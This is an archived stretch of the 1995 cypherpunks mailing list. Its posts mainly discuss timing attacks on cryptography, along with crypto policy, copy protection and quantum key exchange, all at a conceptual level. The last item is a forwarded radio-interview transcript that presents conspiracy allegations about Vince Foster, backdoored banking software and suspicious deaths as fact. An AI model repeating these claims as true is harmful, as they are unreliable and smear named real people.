> *random* delay.  This particular crypto-flaw is pretty easy to fix. 
> (See, I'm not *always* arguing the downside of cryptography!)

Random delay may be harder to get perfect than constant time.  Note that
the actual time for the transaction is the minimum of all the transaction
times you measure, since you can't add a negative delay to them.  It's
presumably even easier if the random distribution is known.  Adding a
random delay means more transactions are required to find each new bit,
but information is still leaking.

> It is worth noting, however, the extent to which "secure" cryptographic
> protocols keep needing to get fixed one last time....  -- Nathaniel

Amen...

	Jim Gillogly
	Trewesday, 21 Foreyule S.R. 1995, 19:16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 13 Dec 1995 11:33:21 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512112111.NAA02653@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Kocher says this about padding to constant time:

> ... If a timer is used to delay returning results until a pre-specified
> time, attackers may be able to monitor other aspects of the system
> performance to determine when the cryptographic computation completes.

Perhaps, but an attack would be much more difficult if the monitoring must
be done outside the host doing the computation (viewing a router from
the outside, say, as Eric Young alludes to), since the scope for covert
channels is much reduced.

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 13 Dec 1995 11:33:40 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC Files Suit to Obtain C
Message-ID: <n1393432005.5337@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


Per various people's requests, I'm only putting this piece on the list. You
can get the rest of the newsletter at www.epic.org/alert/

-dave

>From the EPIC Alert 2.16

=======================================================================
[2] EPIC Files Suit to Obtain Gov't Crypto Report
=======================================================================

EPIC filed suit on December 4 against the U.S. Department of Commerce
under the Freedom of Information Act to force the release of a survey
conducted by the Department on the foreign availability of encryption
software. According to Secretary of Commerce Ron Brown the study has 
been completed and is being held up by the White House Office of 
Science and Technology Policy and the National Security Agency, the 
two agencies most strongly pushing the Mandatory Key Escrow (MKE) 
initiative.

Observers believe that the report will confirm the existence of a
substantial amount of commercial and free software available from
non-U.S. companies worldwide. An ongoing survey conducted by the
Software Publishers Association has found over 450 products from 27
countries. Of those products, 179 use the U.S. Data Encryption Standard
(DES). The existence of a substantial amount of commercial software
overseas cuts against arguments that export controls on encryption
software should be maintained.

The report was created after Congress decided not to pass legislation
last year that would have relaxed export controls on encryption. 
The legislation would have required the Department of Commerce to 
complete the foreign availability report by April 1995. Although the 
legislation was not enacted, the Commerce Department nonetheless agreed 
to conduct the study.

More information on U.S. Cryptography Policy is available at: 

   http://www.epic.org/crypto/

In a related development EPIC Legal Counsel David Sobel appeared before
the National Institute of Standards and Technology on December 5th to 
offer comments on NIST's "Draft Export for Key Escrow Encryption". Sobel
blasted the latest proposal for Mandatory Key Escrow (MKE) and said that 
the administration continues to ignore the interests of the public.  

EPIC also put forward seven recommendations to reform national 
cryptography policy.  The recommendations follow from a presentation to
the National Research Council earlier this year.  The EPIC Statement on 
the NIST standard and the  EPIC proposal for cryptography policy is 
available at:

  http://www.epic.org/crypto/EPIC_Statement.html
  


_________________________________________________________________________
Subject: EPIC Files Suit to Obtain Crypto...
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 05:53:55 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111906.OAA01139@crypto.com>
Message-ID: <199512111944.OAA02490@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:
> >The trivial way to handle this is simply to check user time with the
> >right system calls and make sure it always comes out the same with an
> >apropriate number of sleeps.
> 
> Of course, this works against a remote adversary, but not against one
> on the same machine who can look at actual CPU consumption (which doesn't
> increase when the target is blocked).

True enough, but using busy loops could handle that. However, I must
admit to being far more interested in handling the remote case
efficiently, especially given concerns people have about using
Photuris like systems on heavily pounded servers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 13 Dec 1995 05:54:04 +0800
To: "Rev. Ben" <samman-ben@cs.yale.edu>
Subject: Re: Timing Attacks
In-Reply-To: <Pine.A32.3.91.951211141205.26486F-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <199512112011.PAA01501@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>I'm not so sure I see the great usefulness of this attack.
>
>I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
>comes down to essentially, if I undestand it correctly, is that you need 
>to be as sure of the timing as you can be.
>
>Now, on a distributed system, you can't measure those timings, because 
>any latency  could come from the originating computer, the links in the 
>middle or any combination of them.
>
>Also precise timings can be limited by fluctuating load averages amongst 
>other things in a time-sharing computing environment.  While this might 
>work in a lab, with the current advances in computing speed, the 
>differences between a fast and a slow calculation can easily be opaqued 
>by network lag.
>
>Am I missing something, or does this attack only work in a lab?
>

The more timing noise between the attacker and the target, the
harder it is to exploit the measurements.  Based on some (very
rough) experiments I've set up here, I suspect the attack is easy
if you're on the same computer (and measure CPU load), probably
feasible if you're on the same network and the host and net are
unloaded, and unlikely otherwise.  The attack is especially
interesting against crypto tokens that are supposed to hold a secret
key secret, where you can get very close and take very good timing
measurements.

Keep in mind also that Kocher's results are only the first cut,
based on a very simple statistical model.  I suspect we'll be seeing
many improvements and variations over the coming months.

Bottom line is that implementing good cryptosystems is a lot harder
than one might think...

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Wed, 13 Dec 1995 05:53:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] anti-copy
In-Reply-To: <199512110852.DAA15235@opine.cs.umass.edu>
Message-ID: <9512112112.AA03120@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



futplex@pseudonym.com said:
>> Daark writes: How would it be possible to create files that KNOW they 
>> are  a copy?  

> It's not, to the great dismay of the Software Publishers Association 
> (or  whatever they're called). 

Not to pick nits, but I was deeply into cracking^h^h^hbacking up 
software in the 80's, when I got my first Apple II complete with
4K of RAM.

There are several schemes of copy protection that were used, like strange
sector/track interleaving, and burning the floppies with lasers to
render certain sectors unreadable/writable.  The program would attempt
to read that area of the disk, and if it couldn't it was on the original
media.  

Of course, this was in the days before 20MB MFM drives became the rage,
when Woz was king.

I guess the only way for a program to know if it was a copy
would be to have itself figure out what track/sector it is on and inject
and/or compare that information into the executable.  But since this 
information is no longer easy to come by as operating systems become 
more protected, this wouldn't be viable.  Especially if you take into
account that disks go bad, and backups are needed.

More importantly, it would be very easy to hunt down and replace with 
NOPs.  More so than taking out the dreaded, "enter the phrase on line
3 on page 25 on your manual..."

To summarize, its possible (under _some_ operating systems), but it is 
not a good solution to the problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 13 Dec 1995 05:53:54 +0800
To: A&amp;SUser%cctr.umkc.edu@genie_1.toad.com (A&amp;SUser)
Subject: Re: Pornographic stories
In-Reply-To: <8043943A02502C79@-SMF->
Message-ID: <8143943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


Stop posting this type of crap on the Internet.  People like you are the 
ones to get everyone censored.

Hopefully everyone else will flame you a thousand times over




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 13 Dec 1995 11:33:05 +0800
To: cypherpunks%toad.com@genie_1.toad.com
Subject: <None>
In-Reply-To: <E243943A02502C79@-SMF->
Message-ID: <E243943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


A long time ago, I read about a program that would take a picture, and 
replace the LSB of every pixel
in the picture with your message.  I'm wondering, Is the source code for 
this program availible anywhere
on the net???




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 13 Dec 1995 05:53:42 +0800
To: cypherpunks%toad.com@genie_1.toad.com
Subject: EXON
In-Reply-To: <E343943A02502C79@-SMF->
Message-ID: <E343943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


Could someone please explain to me what this "EXON" thing is??




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@bamako.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 13 Dec 1995 11:33:56 +0800
To: cypherpunks@toad.com
Subject: Re: More FUD from First Virtual [NOISE]
In-Reply-To: <0kn1Q6CMc50e02irtU@nsb.fv.com>
Message-ID: <199512112215.RAA13271@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <0kn1Q6CMc50e02irtU@nsb.fv.com>,
Nathaniel Borenstein <nsb@nsb.fv.com> wrote:
> It's fundamentally different because FV (unlike all the other systems,
> to my knowledge) is a "closed loop" financial instrument.
     [ ... FV is inherently harder to crack than systems which actually
           use encryption, etc. etc., NB claims ... ]

Is it just me, or does this sound like a challenge?

Personally, I'd much rather see a true e-cash system (like Digicash's)
succeed than some pay-by-cleartext-email non-anonymous system.

Maybe Sameer will create a Hack FV page :-)

Or maybe NB will offer a $1000 bug bounty to anyone who can successfully
forge a transaction in FV's system (since it's so foolproof)...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMytkyoZzwIn1bdtAQEY+AF/bGZOi37IlT0LTWz8zhMFM4JqZ2iSchrm
Z3abBPc1MZxxDuG06NT3FCft9+eM13Fb
=yXp4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Dec 1995 05:54:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
In-Reply-To: <9512111557.AA09207@envirolink.org>
Message-ID: <199512112229.RAA27787@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Munster writes:
> Ok, here was the method of key generation i was talking about.  With the light 
> communications, the idea was to use photons whose waves pulsed in certain 
> directions (up/down, left/right, and diagonally) to create a way toommunicate 
> much like morse code.  

Right, this is the main quantum crypto idea of Brassard et al. (See for
example _Applied Crypto_ v.1 pp.408-410)

[...]
> but since the contents of the key were never 
> touched on DIRECTLY, no eavesdfropper could determine the key, 

No, the integrity of the system really depends upon the quantum properties
of light. Among other things, Heisenberg's Uncertainty Principle makes it
impossible for Eve to "eavesdrop" on the photons without affecting them
measurably.

[...]
> however, if one wwas to use the orientation symbols in ones 
> messages, as if they were being beamed, but in an email message instead, one 
> could make use of the simple key, and the simple game of '20 questions' to 
> generate a totally secure key 
[...]

In this situation Eve can read the email traffic without modifying it, so the
game is up.

-Futplex <futplex@pseudonym.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 14 Dec 1995 12:50:39 +0800
To: cypherpunks@toad.com
Subject: Mike Godwin Re: Is there a lawyer in the house?
Message-ID: <9512120257.AA14501@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Mike Godwin <mnemonic@well.com>
Subject: Re: [Black Unicorn: Re: Is there a lawyer in the house?]
Date: Mon, 11 Dec 1995 13:27:34 -0800 (PST)
 
> The question is whether the government can legally compel production
> of your encryption key(s) if you give them to another person, such as
> an escrow agent of your choice, your lawyer, your wife, your bank,
> your web site provider, or whoever.

Compelling the key from the person you gave it to is easy. (That is,
the answer there is yes, assuming no independent claim of non-Fifth
Amendment-derived privilege.)

Whether you have given it to another person does not automatically make it
easier to compel the key from you. But under certain circumstances (and
in certain jurisdictions) it might -- such as if, for example, you were
relying on a "last link" rule to bar your disclosure of the key. If you 
were arguing that the disclosure of the key would be a "last link" in a
chain of inculpatory causation, and it could be shown independently that
you had already disclosed the key to someone else, thereby proving that
you possessed the key at one time, your having done so might undermine
your "last link" argument.

Feel free to forward this.

--Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 14 Dec 1995 12:50:52 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512112111.NAA02653@mage.qualcomm.com>
Message-ID: <9512120054.AA05216@all.net>
MIME-Version: 1.0
Content-Type: text


The timing of cryptosystems to get keys is a special case of covert
channels, and it is not correct to claim that trusted systems (ala the
TCSEC) fail to account for this.

The problem with covert channels (including timing channels such as the
one that gets key material) runs pretty deep.  For example, Shannon's
theory says that for any finite amount of noise, we can always send
information through such a channel at a bandwidth dictated by the signal
to noise ratio.  Furthermore, any time a computational resource with
known characteristics is shared in a way that depends on a secret in any
way, that secret is leaked through the covert channel associated with
the shared resource. 

So the difference between processing a one and a zero even in many forms
of multiplication can be used to determine characteristics of many secret
processes.

	Example: a valid password results in a different execution time
	than an invalid one -> enough statistics, and you can find the
	password.

	Example: a valid UID with an invalid password takes a different
	amount of time than a valid UID with the same password -> enough
	statistics and you can find valid UIDs.

	Example: a transaction worth $1,000 takes a different amount of
	processing time than a transaction for $2.95 -> enough statistics
	and you can figure out which messages are worth breaking.

	Example: usage characteristics change just before major stock
	changes occur -> enough statistics and you can predict when the
	share price will change dramatically.

If you are willing to spend enough effort charactierizing these things,
no system with information-dependent shared resources (e.g., the
Internet) can hold its secrets (a bit of poetic license there). 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 14 Dec 1995 12:51:43 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Attacks
Message-ID: <9512120216.AA03191@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
> 
> I'm not so sure I see the great usefulness of this attack.
> 
> I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
> comes down to essentially, if I undestand it correctly, is that you need 
> to be as sure of the timing as you can be.
> 
> Now, on a distributed system, you can't measure those timings, because 
> any latency  could come from the originating computer, the links in the 
> middle or any combination of them.

But, what if one of the computers is connected on a "hostile" lan.
For example - your typical student PC running in a grad-student office
or on the network in the dorms.  Sniffing packets from it shouldn't be
too hard (yes, good ethernet concentrators make it harder - but not
impossible).  These packets will give you the necessary timing information.

> Also precise timings can be limited by fluctuating load averages amongst 
> other things in a time-sharing computing environment.  While this might 
> work in a lab, with the current advances in computing speed, the 
> differences between a fast and a slow calculation can easily be opaqued 
> by network lag.
> 
> Am I missing something, or does this attack only work in a lab?

What if that is a PC running Windoze or single-user Linux?  Then there
aren't likely to be fluctuating load averages.  The advesary is
close to the one end, and away you go......

Of course, targeting a server is much more pratical in terms of what
you may gain access to.  Several congested network hops will generate
lots of delays, BUT what about the 4:00am hit from the dialup terminal 
servers that happen to be on the same ethernet as the secure server.
This would be a normal situation for many ISPs.

All of that said - I think that this is more pratical in the "lab"
than on the net.  But, it is a very clever approach to the
problem of cracking a crypto system.  It serves us all a good example
that we need to leave NO stone unturned when examining a system.

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gibo@ripco.com (Giles Bowkett)
Date: Thu, 14 Dec 1995 12:49:50 +0800
To: cypherpunks@toad.com
Subject: Timing Attack Paper
Message-ID: <v01530501acf1028a30f2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I went to

http://www.cryptography.com/timingattack.html

and found the whole thing to be totally incomprehensible from
a layman's point of view.  I apologize for having not read
"Applied Cryptography", which might have made the abstract a
simpler read - but even if I had I'd have been baffled by a
lot of the terminology and equations in this paper.

Can anyone post a brief summary which explains the essential
workings of the attack?  I'd be very grateful.

--giles

===========================>>>http://pages.ripco.com/~gibo

as long as I shall stay alive
I never want a nine to five

-----BEGIN PBP SIGNATURE-----
Version: 1.0.0, Copyright 1995, Pretty Bad Privacy

Giles Bowkett
gibo@ripco.com

I am who I am because I say so.  So there.
-----END PBP SIGNATURE-------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon.roland@the-spa.com (Jon Roland)
Date: Wed, 13 Dec 1995 05:27:48 +0800
To: ca-firearms@shell.portal.com
Subject: Jim Quinn interview of James Norman (edited)
Message-ID: <199512120247.SAA12705@nova.unix.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have further attempted to edit the interview transcript, cleaning up
spelling, punctuation, and occasionally guessing what was probably taken
down wrong, from context, (and without the benefit of hearing the actual
interview tape).
============================================================================

The following is a Radio Interview between James Norman, 
formerly Senior Editor of Forbes Magazine and now with Media 
Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. 
In this interview from December 7th, they discuss issues of 
national importance and STUNNING IMPACT. Essentially they give 
out the reason for Vincent Foster's Death, and the fact that 
the "resignations" of the Congresspersons are NOT for policy 
reasons but because they have been caught with millions in 
corrupt funds in Swiss Banks. Read this to learn what the 
"mainstream media" doesn't ever tell you... 


Quinn's Interview with Jim Norman
 
QUINN: Jim Norman, former Senior Editor at Forbes Magazine, and 
currently writing for Media Bypass Magazine after having 
uncovered Caspar Weinberger's Swiss bank account (we do get 
punished for some of the truths we uncover, do we not?). Jim is 
on the phone with us this morning. Good Morning, Jim. 

NORMAN: Hi, how are you? 

QUINN: Pretty good. I want to give people a chance to get an idea 
of what it is we are going to launch into after 8 o'clock, and I 
want to give some background into this. Is it fair to say that 
since Iran-Contra that the government has sort of been involved 
in the drug business? 

NORMAN: Yes, it goes way back before then, actually. It goes back 
even to the Vietnam War days -- remember the Golden Triangle, 
Laos, Cambodia and all that, Pakistan and Afghanistan, but it was 
always on a much smaller scale. What apparently happened was that 
in the 80s we got into it in a big way, basically nationalizing 
the wholesale importation of drugs from Central and South America. 
The idea was that we control it somehow that way; instead, it has 
just become the tail wagging the dog, I think. 

QUINN: It's become the funding source for just about anything 
that the government covertly wants to do, and for the moneys that 
various elements of the government don't want to ask the Congress 
for, nor do they want Congress to know about. 

NORMAN: Right. And it's an arms business, too. They are kind of 
all tied up together. 

QUINN: So it's arms and drugs? 

NORMAN: Right. 

QUINN: Kenneth Starr is currently our Whitewater prosecutor, and 
I have long said on this show that I find Ken Starr interesting 
but also troubling in that there are many elements to the 
Whitewater scandal. Part of the laments have to do with banking 
and have to do with Madison Savings and Loan, check kiting, stuff 
that went on with the Arkansas Development Financial Authority, 
but basically there are really two elements -- there is Whitewater 
and then there is all the stuff with Mena Airport, Iran-Contra, 
drugs into the country, various unexplained deaths, one of them 
Vince Foster, the possibility of espionage on the part of the 
first lady, and all of this lies behind a brick wall that Mr. 
Starr has been positioned upon to make sure that they get Clinton 
but that the fire doesn't burn past that wall; because on the 
other side of that wall are Republicans and Democrats. Am I right? 

NORMAN: That's right. He is not looking at Mena; he doesn't have 
the authority to from Janet Reno. He does have authority to look 
at the Vince Foster death, but I think only inasmuch as it relates 
to the Whitewater situation. The whole thing is hemmed in and 
beyond that is this whole national security blanket that has been 
thrown over big parts of this thing that you couldn't touch if you 
wanted to. 

QUINN: It's interesting, I find, that Dr. Henry Lee, who was part 
of the defense team for the Simpson trial, has ended up working on 
the Vince Foster affair. The word that I get is that he is going 
to say it was indeed a suicide. You have to remember something 
about Dr. Henry Lee -- he was, oddly enough, the guy that was 
called in to do some work on the Danny Casolaro death down in 
Martinsburg, way back in the early nineties. Was it 1991? 

NORMAN: I think it was 1991. 

QUINN: This was that reporter that you may have heard about that 
was found dead in a motel room, supposedly from a self-inflicted 
wound, even though the papers (a year's worth of investigative 
reporting) were all missing. He was working on the story that he 
called the "octopus" and basically it's the same story that you 
are working on, isn't it?
 
NORMAN: Yes, I know I'm talking to a lot of the same sources. 
Danny supposedly slashed his wrists twelve times, sometimes deep 
enough to cut the tendon. 

QUINN: Yeah, right. And his files were all missing. Sure, 
there's a suicide. Right. And they embalmed his body before they 
even had a chance to inform his parents that he was dead. So it's 
another "Arkanside." 

NORMAN: George Williamson, who is an investigative reporter out 
of San Francisco, has been working on that. He has come up with 
all kinds of stuff -- other witnesses that have disappeared, 
people in the hotel who just aren't there anymore -- disappeared 
mysteriously. 

QUINN: It's interesting. There are a lot of people who are 
witnesses to various deaths involved with this Arkansas crowd, 
Danny Casolaro for one. Also, the two young boys on the railroad
tracks down in Arkansas who stumbled on the drug operation. A lot 
of the witnesses around that have met violent and untimely deaths 
as well. So here are a great deal of ugly people involved in 
this. We are going to get down to what it all means in terms of 
government corruption and scandal of immense proportions that 
touch both parties. This is really nonpartisan. The fact that I 
don't happen to like "President Pantload" doesn't have a whole 
lot to do with this; he was just sort of a guy who happened to be 
there with his hand out at the time. It all goes back to the late 
70's, right Jim? 

NORMAN: Yeah, and even before that. Let's start with the early 
80s when Bill Casey came into office in the CIA under Ronald 
Reagan. That's when our government decided to embark on this 
amazing and extremely unbelievably successful effort to spy on 
the world's banks. We did it! We have been spying on world 
banking transactions for more than a dozen years. The way we do 
it is by basically forcing foreign banks, wittingly or 
unwittingly, to buy bugged software and bugged computers that 
let our NSA (National Security Agency) which is the intelligence 
arm of the government, to basically surveil wire transfers all 
over the globe.

QUINN: Let me ask you this. How do you sucker the rest of the 
banking community around the globe into buying the software 
that you are selling? 

NORMAN: First of all you sell to front companies like this 
company Systematics in Arkansas, now called Alltel Information 
Services. They had another company called Boston Systematics,
an affiliate based in Israel mainly. There is Robert Maxwell, the 
UK publisher, who is fronting this stuff. There are a whole bunch 
of people fronting this.
 
QUINN: Wait a minute, Robert Maxwell -- isn't he dead? 

NORMAN: Yeah, he is now. 

QUINN: Didn't he have an unfortunate accident? 

NORMAN: Fell off his yacht in the Atlantic Ocean somewhere. 

QUINN: Why, isn't that amazing! 

NORMAN: The tinkering of it was mainly putting back doors, just a 
few lines of code, that would allow somebody to dial into a 
computer without leaving any footprints, any audit trail that 
you were in there. Then you could go around and look around in 
files or you could collect information from a system without the
user even knowing it 

QUINN: Now this software, which was originally called Promis, 
was stolen from a company called Inslaw by the Justice 
Department. It ended up somewhere, probably at E-Systems
or somewhere, and it was converted into banking software. It 
Started out as software designed to track prosecutorial cases
around the country. My question is -- why didn't Ed Meese just 
pay the damn bill, and none of this would ever have come to 
light! Danny Casolaro was chasing the stolen software when he 
stumbled on what it was being used for. 

NORMAN: Well, the trouble with it was that they bought it for use 
in the Justice Department, but they were going to use it all over 
the place. If they were paying royalties on it, Inslaw would know 
just how extensive the use was of the software, and they didn't 
want people to know how extensively it was going to be used. 

QUINN: I see... 

NORMAN: Plus, a lot of the profits from the resale of this went 
back into private profits. It was customized and resold to the 
intelligence community. It became sort of a basic platform 
database tracking system for most of our intelligence agencies 
and many of those abroad. The idea was "Well, we can all talk to 
each other now." In fact what it has allowed us to do is 
basically rifle through other people's data files abroad too, 
because the stuff was apparently being sold to foreign 
intelligence agencies and it was also bugged. We have other ways 
of basically surveilling and downloading foreign electronic 
databases. The whole computer world is much more porous and 
transparent than anybody wants you to believe. 

QUINN: There is a bank here that I know that uses this software 
right here in this town, and I'm sure that there is probably more 
than one. Everybody's got it.

NORMAN: In some form or another. It goes under different names 
now. It's been modified many times. I think when Inslaw had it, 
it was a half million lines of code. I'm told now it's a couple 
of million lines anyway. It's gone through many, many 
modifications over the years. 

QUINN: This company, Systematics, which is I believe still 8% 
owned by Jackson Stevens at Stevens Inc., who, by the way, is one 
of the backers of Bob Dole -- how troubling is that? 

NORMAN: He is the co-chairman of Dole's finance committee. 

QUINN: That's right! Bob's in town -- Hi Bob -- You'd better 
explain this. You'd better explain Mena, too, Bob, or it's going 
to follow you to the White House. Systematics, I understand, had 
an attorney who was kind of off the record doing work for them, 
named Vince Foster. Is that true? 

NORMAN: Yep, that's true. We've heard that from many, many 
sources now. In fact, Jim Leach's committee has established that 
pretty well with some of the investigation that they have done. 
Foster was a trusted deal guy for Stevens at the law firm. 
Although Foster never shows up officially as an attorney of record 
for Systematics, he was definitely in the loop, basically 
smoothing out things between Systematics and the NSA, which was 
the main government agency that was contracting for a lot of this 
stuff. 

QUINN: So this is how Foster got involved in intelligence, right. 

NORMAN: Yes, because there is heavy duty code and computer 
technology stuff involved here. Apparently, some time in the 
early 80s he developed this relationship with the State of 
Israel. In fact, some of the same handlers I am told were 
involved in the Jonathan Pollard case. They basically nurtured 
him and groomed him for many years and then bingo, they hit the 
jackpot -- he ended up in the White House. Apparently he 
convinced Hillary to help him out on some stuff. 

QUINN: So... what is Foster involved in? It's the mid 80s... 

NORMAN: Mid 80s. Foster is at the Rose Law Firm. Think of him as 
a high-level marketing guy between Systematics and the NSA. 
NSA -- they have all these spooky contracts that they are trying 
to find contractors for. Foster would have been sort of a 
go-between there. Plus Hillary was actually an attorney of record 
for Systematics back in 1978 when Stevens tried to take over the 
Financial General Bank shares in Washington. Those bank holding
companies later became First American - Clark Clifford, Robert 
Altman, all that crowd. 

QUINN: Yeah, the BCCI thing. 

NORMAN: Stevens was fronting for the BCCI crowd and trying to 
take over this Washington Bank Holding Co. The SEC blocked him at 
the time, partly because one of the things he was insisting on 
was that this company Systematics, which at that time was a tiny 
little thing in Arkansas, he was insisting that they be brought 
in to do all of the data processing for this multistate bank 
holding company in Washington. Hillary represented Systematics
in that. Now the thing about Systematics at the time -- it was 
before they even got involved with the bank spying stuff. Abroad 
for many years, they had been what amounted to a laundromat for 
covert funds for the CIA and the intelligence community, quite 
legally, probably. It was done for the national interest. 
Somebody had to move this money around and Systematics was in a 
perfect place to do it because they owned the computers and a 
whole bunch of small banks. They could move this money around 
electronically without the bankers even knowing about it 
necessarily, and it wouldn't go through the normal clearing 
houses. The regulators wouldn't see it. It would just crop up 
wherever the CIA needed it in whatever bogus front company 
account, and it was all just bits and bytes; it was a cyberbank 
-- it still is. 

QUINN: I'm here with Jim Norman, former Senior Editor at Forbes 
Magazine. You know, it's interesting, here is a guy who was with 
Forbes Magazine, a respected senior editor who figured probably 
this would be his life's work. All of a sudden, he finds himself 
a defrocked commando journalist working for Media Bypass Magazine 
out of what? Evanston, Illinois, or somewhere in Indiana? 

NORMAN: Indiana. 

QUINN: Yeah, that's right. Now, I've got a question. Before we get 
into Vince Foster in the mid 80s and Hillary Clinton's role in 
this, how did you get onto this whole scandal? Where did you walk 
through the door on this? 

NORMAN: I came in the back door completely. Look, I had no ax to 
grind here against Bill Clinton or the Administration. I hated 
covering politics. I thought it was all baloney. I'm just a 
business writer, and I never wanted to get enmeshed in this whole 
Whitewater/Vince Foster thing, but it started -- for a couple of 
years I had been following this oil company bankruptcy up in 
Stamford, Connecticut, because I had covered oil. This thing 
never made sense to me. There is no reason why this company went 
bust and, in fact, when I actually got into it and started redoing 
the oil trading transactions, the reason they lost money: they 
weren't losing it. They were hiding it. They were parking it off 
shore with another company that was financing arms sales to Iraq, 
cluster bombs and stuff like that all through the 80s. And, this 
Chilean arms dealer, Cardone, who was providing weapons, was also, 
it turns out, brokering some of the sales of this stolen software. 
Okay, that gets me into the software story. 

QUINN: So that gets you onto the Promis software, and you and 
Danny Casolaro are now on the same road. 

NORMAN: Right, and then in the process of that, I started talking 
to a whole bunch of rather spooky, strange intelligence community 
characters, and I was sitting at a guy's living room down in 
Kentucky one day. He was sitting there in the middle of the night 
blowing smoke rings, and he said, "Yo, by the way, Vince Foster, 
he was under investigation." I said, "Under investigation, for 
what?" And, he said, "Well, it's spelled 'Espionage.'" BOINK!!... 
and that's how I got on this whole Vince Foster thing. 

QUINN: So that's how it happened? 

NORMAN: Yeah. 

QUINN: Okay, now here it is, the mid 80s. Vince Foster is working 
for Systematics, and he is coming into contact with the 
intelligence community. What is, how did Hillary Clinton and the 
Israeli Mossad and all of this come together and what happened? 

NORMAN: Well, I think that they had been... look the Israelis were 
key partners with us in this bank spying effort. This is a joint 
allied government effort, and the Israelis were one of the key 
front people in this, in selling and supporting this software all 
over the world, so that people weren't thinking they were getting 
the software directly from the U.S. You know, there was an 
Israeli front company used to sell this stuff to foreign banks. 

QUINN: Well, they sold it to the Moscow bank. I know that. 

NORMAN: Well, Systematics did, yeah, and Systematics got involved 
in supporting this stuff all over the world, a little company in 
Arkansas... Go figure. Come on. 

QUINN: Yeah, really. 

NORMAN: I mean, main software people, they operate in New York 
and places like that and not out of Podunk, Arkansas. So, at any 
rate, the Israelis had ties into this whole thing all along, and, 
you know, they are our friends. We do give them a lot of stuff 
and share a lot of stuff. 

QUINN: Well, the whole idea was to track terrorist money, and the 
Israelis have a great interest in that, and rightly so. There is 
no problem here. 

NORMAN: The name of this problem was "follow the money for 
terrorist reasons," but once you set that up, you can do all 
kinds of stuff with it. I mean, we were spying on everybody's 
money. I think that's probably how we helped bust the Soviet 
Union. We found out just how deep their pockets were, where their 
money was, who we could bribe. You know, acting as a financial 
destruction of their society more than anything. 

QUINN: So, how does Foster get involved in espionage? 

NORMAN: Well, I think it was money. Money, money, money. And, 
especially you know with this whole political thing, it takes so 
much money to run for office. I mean, my theory is that the 
actual spending is probably twice of what anybody declares when 
you add up all of the soft dollars and everything. I think there
